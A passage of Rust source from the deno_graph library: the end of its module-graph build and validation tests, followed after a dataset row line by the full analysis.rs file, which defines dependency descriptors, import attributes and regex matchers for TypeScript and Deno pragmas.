graph.contains(&ModuleSpecifier::parse("file:///a/test02.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/a.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/c.ts").unwrap())
);
}
#[tokio::test]
async fn test_build_graph_multiple_times() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as b from "./test02.ts";"#,
},
),
(
"file:///a/test02.ts",
Source::Module {
specifier: "file:///a/test02.ts",
maybe_headers: None,
content: r#"import "https://example.com/c.ts"; export const b = "b";"#,
},
),
(
"https://example.com/a.ts",
Source::Module {
specifier: "https://example.com/a.ts",
maybe_headers: None,
content: r#"import * as c from "./c.ts";"#,
},
),
(
"https://example.com/c.ts",
Source::Module {
specifier: "https://example.com/c.ts",
maybe_headers: None,
content: r#"import "./d.ts"; export const c = "c";"#,
},
),
(
"https://example.com/d.ts",
Source::Module {
specifier: "https://example.com/d.ts",
maybe_headers: None,
content: r#"export const d = "d";"#,
},
),
],
vec![],
);
let first_root = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let second_root =
ModuleSpecifier::parse("https://example.com/a.ts").unwrap();
let third_root =
ModuleSpecifier::parse("https://example.com/d.ts").unwrap();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![first_root.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 4);
assert_eq!(graph.roots, IndexSet::from([first_root.clone()]));
// now build with the second root
graph
.build(
vec![second_root.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
let mut roots = IndexSet::from([first_root, second_root]);
assert_eq!(graph.module_slots.len(), 5);
assert_eq!(graph.roots, roots);
assert!(
graph.contains(&ModuleSpecifier::parse("file:///a/test01.ts").unwrap())
);
assert!(
graph.contains(&ModuleSpecifier::parse("file:///a/test02.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/a.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/c.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/d.ts").unwrap())
);
// now try making one of the already existing modules a root
graph
.build(
vec![third_root.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
roots.insert(third_root);
assert_eq!(graph.module_slots.len(), 5);
assert_eq!(graph.roots, roots);
}
#[tokio::test]
async fn test_build_graph_json_module_root() {
let loader = setup(
vec![(
"file:///a/test.json",
Source::Module {
specifier: "file:///a/test.json",
maybe_headers: None,
content: r#"{"a": 1, "b": "c"}"#,
},
)],
vec![],
);
let roots = vec![ModuleSpecifier::parse("file:///a/test.json").unwrap()];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
roots.clone(),
Default::default(),
&loader,
BuildOptions {
is_dynamic: true,
..Default::default()
},
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": [
"file:///a/test.json"
],
"modules": [
{
"size": 18,
"kind": "asserted",
"mediaType": "Json",
"specifier": "file:///a/test.json"
}
],
"redirects": {}
})
);
}
#[tokio::test]
async fn test_valid_type_missing() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"// @deno-types=./test02.d.ts
import * as a from "./test02.js";
console.log(a);
"#,
},
),
(
"file:///a/test02.js",
Source::Module {
specifier: "file:///a/test02.js",
maybe_headers: None,
content: r#"export const b = "b";"#,
},
),
],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("file:///a/test01.ts").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert!(graph.valid().is_ok());
}
#[tokio::test]
async fn test_valid_code_missing() {
let loader = setup(
vec![(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as a from "./test02.js";
console.log(a);
"#,
},
)],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert!(graph.valid().is_err());
assert_eq!(
graph.valid().err().unwrap().to_string(),
"Module not found \"file:///a/test02.js\"."
);
}
#[tokio::test]
async fn test_remote_import_data_url() {
let loader = setup(
vec![(
"https://deno.land/main.ts",
Source::Module {
specifier: "https://deno.land/main.ts",
maybe_headers: None,
content: r#"import * as a from "data:application/typescript;base64,ZXhwb3J0IGNvbnN0IGEgPSAiYSI7CgpleHBvcnQgZW51bSBBIHsKICBBLAogIEIsCiAgQywKfQo=";
console.log(a);
"#,
},
)],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("https://deno.land/main.ts").unwrap();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert!(graph.valid().is_ok());
}
#[tokio::test]
async fn test_remote_import_local_url() {
for scheme in &["http", "https"] {
let root_specifier =
ModuleSpecifier::parse(&format!("{scheme}://deno.land/main.ts"))
.unwrap();
let loader = setup(
vec![
(
root_specifier.as_str(),
Source::Module {
specifier: root_specifier.as_str(),
maybe_headers: None,
content: r#"import * as a from "file:///local.ts";
console.log(a);
"#,
},
),
(
"file:///local.ts",
Source::Module {
specifier: "file:///local.ts",
maybe_headers: None,
content: r#"console.log(1);"#,
},
),
],
vec![],
);
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
Default::default(),
&loader,
Default::default(),
)
.await;
assert!(matches!(
graph.valid().err().unwrap(),
ModuleGraphError::ResolutionError(
ResolutionError::InvalidLocalImport { .. },
)
));
}
}
#[tokio::test]
async fn test_remote_import_local_url_remapped() {
for scheme in &["http", "https"] {
let root_specifier_str = format!("{scheme}://deno.land/main.ts");
let root_specifier = ModuleSpecifier::parse(&root_specifier_str).unwrap();
let loader = setup(
vec![
(
root_specifier.as_str(),
Source::Module {
specifier: root_specifier.as_str(),
maybe_headers: None,
content: r#"import * as a from "remapped";
console.log(a);
"#,
},
),
(
"file:///local.ts",
Source::Module {
specifier: "file:///local.ts",
maybe_headers: None,
content: r#"console.log(1);"#,
},
),
],
vec![],
);
let resolver = MockResolver::new(
vec![(
root_specifier_str.as_str(),
vec![("remapped", "file:///local.ts")],
)],
vec![],
);
let maybe_resolver: Option<&dyn Resolver> = Some(&resolver);
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
BuildOptions {
resolver: maybe_resolver,
..Default::default()
},
)
.await;
assert!(graph.valid().is_ok());
}
}
#[tokio::test]
async fn test_build_graph_imports() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"console.log("a");"#,
},
),
(
"file:///a/types.d.ts",
Source::Module {
specifier: "file:///a/types.d.ts",
maybe_headers: None,
content: r#"export type { A } from "./types_01.d.ts";"#,
},
),
(
"file:///a/types_01.d.ts",
Source::Module {
specifier: "file:///a/types_01.d.ts",
maybe_headers: None,
content: r#"export class A {};"#,
},
),
],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let config_specifier =
ModuleSpecifier::parse("file:///a/tsconfig.json").unwrap();
let imports = vec![ReferrerImports {
referrer: config_specifier,
imports: vec!["./types.d.ts".to_string()],
}];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
imports,
&loader,
BuildOptions::default(),
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": ["file:///a/test01.ts"],
"modules": [
{
"kind": "esm",
"mediaType": "TypeScript",
"size": 17,
"specifier": "file:///a/test01.ts"
},
{
"dependencies": [
{
"specifier": "./types_01.d.ts",
"type": {
"specifier": "file:///a/types_01.d.ts",
"span": {
"start": {
"line":0,
"character":23
},
"end": {
"line":0,
"character":40
}
}
}
}
],
"kind": "esm",
"mediaType": "Dts",
"size": 41,
"specifier": "file:///a/types.d.ts"
},
{
"kind": "esm",
"mediaType": "Dts",
"size": 18,
"specifier": "file:///a/types_01.d.ts"
}
],
"imports": [
{
"referrer": "file:///a/tsconfig.json",
"dependencies": [
{
"specifier": "./types.d.ts",
"type": {
"specifier": "file:///a/types.d.ts",
"span": {
"start": {
"line": 0,
"character": 0
},
"end": {
"line": 0,
"character": 0
}
}
}
}
]
},
],
"redirects":{},
})
);
}
#[tokio::test]
async fn test_build_graph_imports_imported() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import config from "./deno.json" assert { type: "json" };
console.log(config);"#,
},
),
(
"file:///a/deno.json",
Source::Module {
specifier: "file:///a/deno.json",
maybe_headers: None,
content: r#"{
"compilerOptions": {
"jsxImportSource": "https://esm.sh/preact"
}
}"#,
},
),
(
"https://esm.sh/preact/runtime-jsx",
Source::Module {
specifier: "https://esm.sh/preact/runtime-jsx",
maybe_headers: Some(vec![(
"content-type",
"application/javascript",
)]),
content: r#"export function jsx() {}"#,
},
),
],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let config_specifier =
ModuleSpecifier::parse("file:///a/deno.json").unwrap();
let imports = vec![ReferrerImports {
referrer: config_specifier,
imports: vec!["https://esm.sh/preact/runtime-jsx".to_string()],
}];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
imports,
&loader,
BuildOptions::default(),
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": ["file:///a/test01.ts"],
"modules": [
{
"kind": "asserted",
"size": 125,
"mediaType": "Json",
"specifier": "file:///a/deno.json",
},
{
"dependencies": [
{
"specifier": "./deno.json",
"code": {
"specifier": "file:///a/deno.json",
"resolutionMode": "import",
"span": {
"start": {
"line": 0,
"character": 19,
},
"end": {
"line": 0,
"character": 32,
}
}
},
"assertionType": "json"
}
],
"kind": "esm",
"size": 91,
"mediaType": "TypeScript",
"specifier": "file:///a/test01.ts",
},
{
"kind": "esm",
"size": 24,
"mediaType": "JavaScript",
"specifier": "https://esm.sh/preact/runtime-jsx",
},
],
"imports": [
{
"referrer": "file:///a/deno.json",
"dependencies": [
{
"specifier": "https://esm.sh/preact/runtime-jsx",
"type": {
"specifier": "https://esm.sh/preact/runtime-jsx",
"span": {
"start": {
"line": 0,
"character": 0,
},
"end": {
"line": 0,
"character": 0,
}
}
},
}
],
}
],
"redirects":{},
})
);
}
#[tokio::test]
async fn test_build_graph_imports_resolve_dependency() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"console.log("a");"#,
},
),
(
"https://example.com/jsx-runtime",
Source::Module {
specifier: "https://example.com/jsx-runtime",
maybe_headers: Some(vec![
("content-type", "application/javascript"),
("x-typescript-types", "./jsx-runtime.d.ts"),
]),
content: r#"export const a = "a";"#,
},
),
(
"https://example.com/jsx-runtime.d.ts",
Source::Module {
specifier: "https://example.com/jsx-runtime.d.ts",
maybe_headers: Some(vec![(
"content-type",
"application/typescript",
)]),
content: r#"export const a: "a";"#,
},
),
],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let config_specifier =
ModuleSpecifier::parse("file:///a/tsconfig.json").unwrap();
let imports = vec![ReferrerImports {
referrer: config_specifier.clone(),
imports: vec!["https://example.com/jsx-runtime".to_string()],
}];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
imports,
&loader,
BuildOptions::default(),
)
.await;
assert_eq!(
graph.resolve_dependency(
"https://example.com/jsx-runtime",
&config_specifier,
false
),
Some(ModuleSpecifier::parse("https://example.com/jsx-runtime").unwrap())
.as_ref()
);
assert_eq!(
graph.resolve_dependency(
"https://example.com/jsx-runtime",
&config_specifier,
true
),
Some(
ModuleSpecifier::parse("https://example.com/jsx-runtime.d.ts").unwrap()
)
.as_ref()
);
assert_eq!(
graph
.try_get(
&ModuleSpecifier::parse("https://example.com/jsx-runtime").unwrap()
)
.unwrap()
.unwrap()
.specifier()
.as_str(),
"https://example.com/jsx-runtime"
);
assert_eq!(
graph
.try_get_prefer_types(
&ModuleSpecifier::parse("https://example.com/jsx-runtime").unwrap()
)
.unwrap()
.unwrap()
.specifier()
.as_str(),
// should end up at the declaration file
"https://example.com/jsx-runtime.d.ts"
);
}
#[tokio::test]
async fn test_build_graph_with_headers() {
let loader = setup(
vec![(
"https://example.com/a",
Source::Module {
specifier: "https://example.com/a",
maybe_headers: Some(vec![(
"content-type",
"application/typescript; charset=utf-8",
)]),
content: r#"declare interface A { a: string; }"#,
},
)],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("https://example.com/a").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 1);
assert_eq!(graph.roots, IndexSet::from([root_specifier.clone()]));
let module = graph
.module_slots
.get(&root_specifier)
.unwrap()
.module()
.unwrap()
.js()
.unwrap();
assert_eq!(module.media_type, MediaType::TypeScript);
}
#[tokio::test]
async fn test_build_graph_jsx_import_source() {
let loader = setup(
vec![
(
"file:///a/test01.tsx",
Source::Module {
specifier: "file:///a/test01.tsx",
maybe_headers: None,
content: r#"/* @jsxImportSource https://example.com/preact */
export function A() {
<div>Hello Deno</div>
}
"#,
},
),
(
"https://example.com/preact/jsx-runtime",
Source::Module {
specifier: "https://example.com/preact/jsx-runtime/index.js",
maybe_headers: Some(vec![(
"content-type",
"application/javascript",
)]),
content: r#"export function jsx() {}"#,
},
),
],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("file:///a/test01.tsx").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": [
"file:///a/test01.tsx"
],
"modules": [
{
"dependencies": [
{
"specifier": "https://example.com/preact/jsx-runtime",
"code": {
"specifier": "https://example.com/preact/jsx-runtime",
"span": {
"start": {
"line": 0,
"character": 20
},
"end": {
"line": 0,
"character": 46
}
}
}
}
],
"kind": "esm",
"mediaType": "TSX",
"size": 147,
"specifier": "file:///a/test01.tsx"
},
{
"kind": "esm",
"mediaType": "JavaScript",
"size": 24,
"specifier": "https://example.com/preact/jsx-runtime/index.js"
}
],
"redirects": {
"https://example.com/preact/jsx-runtime": "https://example.com/preact/jsx-runtime/index.js"
}
})
);
}
#[tokio::test]
async fn test_build_graph_jsx_import_source_types() {
let loader = setup(
vec![
(
"file:///a/test01.tsx",
Source::Module {
specifier: "file:///a/test01.tsx",
maybe_headers: None,
content: r#"/* @jsxImportSource https://example.com/preact */
/* @jsxImportSourceTypes https://example.com/preact-types */
export function A() {
<div>Hello Deno</div>
}
"#,
},
),
(
"https://example.com/preact/jsx-runtime",
Source::Module {
specifier: "https://example.com/preact/jsx-runtime/index.js",
maybe_headers: Some(vec![(
"content-type",
"application/javascript",
)]),
content: r#"export function jsx() {}"#,
},
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/analysis.rs | src/analysis.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::HashMap;
use std::sync::Arc;
use deno_error::JsErrorBox;
use deno_media_type::MediaType;
use once_cell::sync::Lazy;
use regex::Regex;
use serde::Deserialize;
use serde::Serialize;
use crate::ModuleSpecifier;
use crate::graph::Position;
use crate::graph::PositionRange;
use crate::source::ResolutionMode;
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase", tag = "type")]
pub enum DependencyDescriptor {
Static(StaticDependencyDescriptor),
Dynamic(DynamicDependencyDescriptor),
}
impl DependencyDescriptor {
pub fn as_static(&self) -> Option<&StaticDependencyDescriptor> {
match self {
Self::Static(descriptor) => Some(descriptor),
Self::Dynamic(_) => None,
}
}
pub fn as_dynamic(&self) -> Option<&DynamicDependencyDescriptor> {
match self {
Self::Static(_) => None,
Self::Dynamic(d) => Some(d),
}
}
pub fn import_attributes(&self) -> &ImportAttributes {
match self {
DependencyDescriptor::Static(d) => &d.import_attributes,
DependencyDescriptor::Dynamic(d) => &d.import_attributes,
}
}
}
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
#[serde(untagged)]
pub enum ImportAttribute {
/// The value of this attribute could not be statically analyzed.
Unknown,
/// The value of this attribute is a statically analyzed string.
Known(String),
}
#[derive(Clone, Default, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub enum ImportAttributes {
/// There was no import attributes object literal.
#[default]
None,
/// The set of attribute keys could not be statically analyzed.
Unknown,
/// The set of attribute keys is statically analyzed, though each respective
/// value may or may not not be for dynamic imports.
Known(HashMap<String, ImportAttribute>),
}
impl ImportAttributes {
pub fn is_none(&self) -> bool {
matches!(self, ImportAttributes::None)
}
pub fn get(&self, key: &str) -> Option<&str> {
match self {
ImportAttributes::Known(map) => match map.get(key) {
Some(ImportAttribute::Known(value)) => Some(value),
_ => None,
},
_ => None,
}
}
pub fn has_asset(&self) -> bool {
let Some(value) = self.get("type") else {
return false;
};
matches!(value, "text" | "bytes")
}
}
#[derive(
Default, Clone, Copy, Debug, Eq, PartialEq, Serialize, Deserialize,
)]
#[serde(rename_all = "camelCase")]
pub enum DynamicDependencyKind {
#[default]
Import,
ImportSource,
Require,
}
#[derive(Clone, Copy, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub enum StaticDependencyKind {
Import,
ImportSource,
ImportType,
ImportEquals,
Export,
ExportType,
ExportEquals,
MaybeTsModuleAugmentation,
}
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct StaticDependencyDescriptor {
/// The kind of dependency.
pub kind: StaticDependencyKind,
/// An optional specifier overriding the types associated with the
/// import/export statement, if any.
#[serde(skip_serializing_if = "Option::is_none", default)]
pub types_specifier: Option<SpecifierWithRange>,
/// The text specifier associated with the import/export statement.
pub specifier: String,
/// The range of the specifier.
pub specifier_range: PositionRange,
#[serde(skip_serializing_if = "is_false", default, rename = "sideEffect")]
pub is_side_effect: bool,
/// Import attributes for this dependency.
#[serde(skip_serializing_if = "ImportAttributes::is_none", default)]
pub import_attributes: ImportAttributes,
}
impl From<StaticDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: StaticDependencyDescriptor) -> Self {
DependencyDescriptor::Static(descriptor)
}
}
#[derive(Default, Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase", untagged)]
pub enum DynamicArgument {
String(String),
Template(Vec<DynamicTemplatePart>),
/// An expression that could not be analyzed.
#[default]
Expr,
}
impl DynamicArgument {
pub fn is_expr(&self) -> bool {
matches!(self, DynamicArgument::Expr)
}
}
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase", tag = "type")]
pub enum DynamicTemplatePart {
String {
value: String,
},
/// An expression that could not be analyzed.
Expr,
}
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct DynamicDependencyDescriptor {
#[serde(skip_serializing_if = "is_dynamic_esm", default)]
pub kind: DynamicDependencyKind,
/// An optional specifier overriding the types associated with the
/// import/export statement, if any.
#[serde(skip_serializing_if = "Option::is_none", default)]
pub types_specifier: Option<SpecifierWithRange>,
/// The argument associated with the dynamic import.
#[serde(skip_serializing_if = "DynamicArgument::is_expr", default)]
pub argument: DynamicArgument,
/// The range of the argument.
pub argument_range: PositionRange,
/// Import attributes for this dependency.
#[serde(skip_serializing_if = "ImportAttributes::is_none", default)]
pub import_attributes: ImportAttributes,
}
fn is_dynamic_esm(kind: &DynamicDependencyKind) -> bool {
*kind == DynamicDependencyKind::Import
}
impl From<DynamicDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: DynamicDependencyDescriptor) -> Self {
DependencyDescriptor::Dynamic(descriptor)
}
}
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct SpecifierWithRange {
pub text: String,
pub range: PositionRange,
}
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub enum TypeScriptTypesResolutionMode {
Require,
Import,
}
impl TypeScriptTypesResolutionMode {
#[allow(clippy::should_implement_trait)]
pub fn from_str(text: &str) -> Option<Self> {
match text {
"import" => Some(Self::Import),
"require" => Some(Self::Require),
_ => None,
}
}
pub fn as_deno_graph(&self) -> ResolutionMode {
match self {
Self::Require => ResolutionMode::Require,
Self::Import => ResolutionMode::Import,
}
}
}
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
#[serde(tag = "type")]
pub enum TypeScriptReference {
Path(SpecifierWithRange),
#[serde(rename_all = "camelCase")]
Types {
#[serde(flatten)]
specifier: SpecifierWithRange,
#[serde(skip_serializing_if = "Option::is_none", default)]
resolution_mode: Option<TypeScriptTypesResolutionMode>,
},
}
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct JsDocImportInfo {
#[serde(flatten)]
pub specifier: SpecifierWithRange,
#[serde(skip_serializing_if = "Option::is_none", default)]
pub resolution_mode: Option<TypeScriptTypesResolutionMode>,
}
/// Information about JS/TS module.
#[derive(Debug, Default, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ModuleInfo {
/// If the module has nothing that makes it for sure an ES module
/// (no TLA, imports, exports, import.meta).
#[serde(skip_serializing_if = "is_false", default, rename = "script")]
pub is_script: bool,
/// Dependencies of the module.
#[serde(skip_serializing_if = "Vec::is_empty", default)]
pub dependencies: Vec<DependencyDescriptor>,
/// Triple slash references.
#[serde(skip_serializing_if = "Vec::is_empty", default)]
pub ts_references: Vec<TypeScriptReference>,
/// Comment with `@ts-self-types` pragma.
#[serde(skip_serializing_if = "Option::is_none", default)]
pub self_types_specifier: Option<SpecifierWithRange>,
/// Comment with a `@jsxImportSource` pragma on JSX/TSX media types
#[serde(skip_serializing_if = "Option::is_none", default)]
pub jsx_import_source: Option<SpecifierWithRange>,
/// Comment with a `@jsxImportSourceTypes` pragma on JSX/TSX media types
#[serde(skip_serializing_if = "Option::is_none", default)]
pub jsx_import_source_types: Option<SpecifierWithRange>,
/// Type imports in JSDoc comment blocks (e.g. `{import("./types.d.ts").Type}`)
/// or `@import { SomeType } from "npm:some-module"`.
#[serde(skip_serializing_if = "Vec::is_empty", default)]
pub jsdoc_imports: Vec<JsDocImportInfo>,
/// Source map URL extracted from sourceMappingURL comment
#[serde(skip_serializing_if = "Option::is_none", default)]
pub source_map_url: Option<SpecifierWithRange>,
}
fn is_false(v: &bool) -> bool {
!v
}
pub fn module_graph_1_to_2(module_info: &mut serde_json::Value) {
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
struct Comment {
text: String,
range: PositionRange,
}
/// Searches comments for any `@deno-types` compiler hints.
fn analyze_deno_types(
leading_comments: &[Comment],
) -> Option<SpecifierWithRange> {
fn comment_position_to_position_range(
mut comment_start: Position,
range: std::ops::Range<usize>,
) -> PositionRange {
// the comment text starts after the double slash or slash star, so add 2
comment_start.character += 2;
PositionRange {
// This will always be on the same line.
// Does -1 and +1 to include the quotes
start: Position {
line: comment_start.line,
character: comment_start.character + range.start - 1,
},
end: Position {
line: comment_start.line,
character: comment_start.character + range.end + 1,
},
}
}
let comment = leading_comments.last()?;
let deno_types = find_deno_types(&comment.text)?;
Some(SpecifierWithRange {
text: deno_types.text.to_string(),
range: comment_position_to_position_range(
comment.range.start,
deno_types.range,
),
})
}
// To support older module graphs, we need to convert the module graph 1
// to the new format. To do this, we need to extract the types specifier
// from the leading comments and add it to the dependency object.
if let serde_json::Value::Object(module_info) = module_info
&& let Some(dependencies) = module_info
.get_mut("dependencies")
.and_then(|v| v.as_array_mut())
{
for dependency in dependencies {
if let Some(dependency) = dependency.as_object_mut()
&& let Some(leading_comments) = dependency
.get("leadingComments")
.and_then(|v| v.as_array())
.and_then(|v| {
v.iter()
.map(|v| serde_json::from_value(v.clone()).ok())
.collect::<Option<Vec<Comment>>>()
})
{
if let Some(deno_types) = analyze_deno_types(&leading_comments) {
dependency.insert(
"typesSpecifier".to_string(),
serde_json::to_value(deno_types).unwrap(),
);
}
dependency.remove("leadingComments");
}
}
};
}
/// Analyzes the provided module.
///
/// It can be assumed that the source has not changed since
/// it was loaded by deno_graph.
#[async_trait::async_trait(?Send)]
pub trait ModuleAnalyzer {
/// Analyzes the module.
async fn analyze(
&self,
specifier: &ModuleSpecifier,
source: Arc<str>,
media_type: MediaType,
) -> Result<ModuleInfo, JsErrorBox>;
}
impl<'a> Default for &'a dyn ModuleAnalyzer {
fn default() -> &'a dyn ModuleAnalyzer {
#[cfg(feature = "swc")]
{
&crate::ast::DefaultModuleAnalyzer
}
#[cfg(not(feature = "swc"))]
{
panic!(
"Provide a module analyzer or turn on the 'swc' cargo feature of deno_graph."
);
}
}
}
pub struct DenoTypesPragmaMatch<'a> {
pub text: &'a str,
pub range: std::ops::Range<usize>,
pub is_quoteless: bool,
}
/// Matches a `/// <reference ... />` comment reference.
pub fn is_comment_triple_slash_reference(comment_text: &str) -> bool {
static TRIPLE_SLASH_REFERENCE_RE: Lazy<Regex> =
Lazy::new(|| Regex::new(r"(?i)^/\s*<reference\s.*?/>").unwrap());
TRIPLE_SLASH_REFERENCE_RE.is_match(comment_text)
}
/// Matches a path reference, which adds a dependency to a module
pub fn find_path_reference(text: &str) -> Option<regex::Match<'_>> {
static PATH_REFERENCE_RE: Lazy<Regex> =
Lazy::new(|| Regex::new(r#"(?i)\spath\s*=\s*["']([^"']*)["']"#).unwrap());
PATH_REFERENCE_RE
.captures(text)
.and_then(|captures| captures.get(1))
}
/// Matches a types reference, which for JavaScript files indicates the
/// location of types to use when type checking a program that includes it as
/// a dependency.
pub fn find_types_reference(text: &str) -> Option<regex::Match<'_>> {
static TYPES_REFERENCE_RE: Lazy<Regex> =
Lazy::new(|| Regex::new(r#"(?i)\stypes\s*=\s*["']([^"']*)["']"#).unwrap());
TYPES_REFERENCE_RE.captures(text).and_then(|c| c.get(1))
}
/// Ex. `resolution-mode="require"` in `/// <reference types="pkg" resolution-mode="require" />`
pub fn find_resolution_mode(text: &str) -> Option<regex::Match<'_>> {
static RESOLUTION_MODE_RE: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)\sresolution-mode\s*=\s*["']([^"']*)["']"#).unwrap()
});
RESOLUTION_MODE_RE.captures(text).and_then(|m| m.get(1))
}
/// Matches the `@jsxImportSource` pragma.
pub fn find_jsx_import_source(text: &str) -> Option<regex::Match<'_>> {
static JSX_IMPORT_SOURCE_RE: Lazy<Regex> =
Lazy::new(|| Regex::new(r"(?i)^[\s*]*@jsxImportSource\s+(\S+)").unwrap());
JSX_IMPORT_SOURCE_RE.captures(text).and_then(|c| c.get(1))
}
/// Matches the `@jsxImportSourceTypes` pragma.
pub fn find_jsx_import_source_types(text: &str) -> Option<regex::Match<'_>> {
static JSX_IMPORT_SOURCE_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)^[\s*]*@jsxImportSourceTypes\s+(\S+)").unwrap()
});
JSX_IMPORT_SOURCE_TYPES_RE
.captures(text)
.and_then(|c| c.get(1))
}
/// Matches the `sourceMappingURL` comment.
pub fn find_source_mapping_url(text: &str) -> Option<regex::Match<'_>> {
static SOURCE_MAPPING_URL_RE: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)^[#@]\s*sourceMappingURL\s*=\s*(\S+)").unwrap()
});
SOURCE_MAPPING_URL_RE.captures(text).and_then(|c| c.get(1))
}
/// Matches the `@ts-self-types` pragma.
pub fn find_ts_self_types(text: &str) -> Option<regex::Match<'_>> {
static TS_SELF_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)^\s*@ts-self-types\s*=\s*["']([^"']+)["']"#).unwrap()
});
TS_SELF_TYPES_RE.captures(text).and_then(|c| c.get(1))
}
/// Matches the `@ts-types` pragma.
pub fn find_ts_types(text: &str) -> Option<regex::Match<'_>> {
static TS_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)^\s*@ts-types\s*=\s*["']([^"']+)["']"#).unwrap()
});
TS_TYPES_RE.captures(text).and_then(|c| c.get(1))
}
pub fn find_deno_types(text: &str) -> Option<DenoTypesPragmaMatch<'_>> {
/// Matches the `@deno-types` pragma.
static DENO_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)^\s*@deno-types\s*=\s*(?:["']([^"']+)["']|(\S+))"#)
.unwrap()
});
let captures = DENO_TYPES_RE.captures(text)?;
if let Some(m) = captures.get(1) {
Some(DenoTypesPragmaMatch {
text: m.as_str(),
range: m.range(),
is_quoteless: false,
})
} else if let Some(m) = captures.get(2) {
Some(DenoTypesPragmaMatch {
text: m.as_str(),
range: m.range(),
is_quoteless: true,
})
} else {
unreachable!("Unexpected captures from deno types regex")
}
}
